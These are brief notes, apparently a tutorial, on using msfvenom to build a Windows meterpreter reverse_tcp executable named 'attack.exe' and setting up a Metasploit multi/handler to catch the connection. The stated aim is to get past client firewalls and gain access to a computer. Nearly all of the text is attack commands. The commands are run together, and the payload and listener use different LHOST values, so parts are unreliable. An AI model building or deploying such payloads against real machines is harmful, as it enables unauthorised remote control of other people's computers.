—msfvenom and sessions
Because many clients are behind a firewall, we need the client to initiate the session outbound to us
By creating a payload exe file we can create a session to gain access to a computer.
Step 1.
Make sure Metasploit is connected to the Postgres database
db_status
Service postgresql start
msf > msfdb init
- Create the attack filemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=1234 —format=exe > attack.exe
- Set metasploit to listen on port 1234Use exploit/multi/handlerSet LHOST 192.168.1.1Set LPORT 1234Set payload windows/meterpreter/reverse_tcpRun –
- Once executed on the client machine we can connect to the session